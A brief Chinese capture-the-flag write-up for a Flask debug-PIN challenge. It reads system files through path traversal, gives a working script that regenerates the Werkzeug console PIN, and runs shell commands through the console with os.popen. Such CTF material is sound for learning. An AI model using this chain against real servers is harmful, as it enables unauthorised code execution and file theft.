PolarCTF记一道flask-Pin

web-flask_pin

从报错信息中得到
url/file?filename=../../../../../../etc/passwd
得到用户root可以利用，其他都显示nologin
/sys/class/net/ens33/address    得到mac网卡地址
系统id：先读取/etc/machine-id，再读取/proc/self/cgroup，并将第一个获取到的值与第二个获取到的id值进行拼接(有docker)(非docker，直接/etc/machine-id)

3.6及以下MD5？3.8及以上sha1？不清楚

import hashlib
from itertools import chain

probably_public_bits = [
     'root'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
 ]
 
private_bits = [
     '2485378744322',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '6e1d32ebf38c587c4a41089c0c744c83'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                        for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

报错进入控制台，或url/console

>>import os
>>os.popen("ls /").read()
>>os.popen("cat /xxx").read()
出现\nflaggggg,实际可能是\n换行+文件名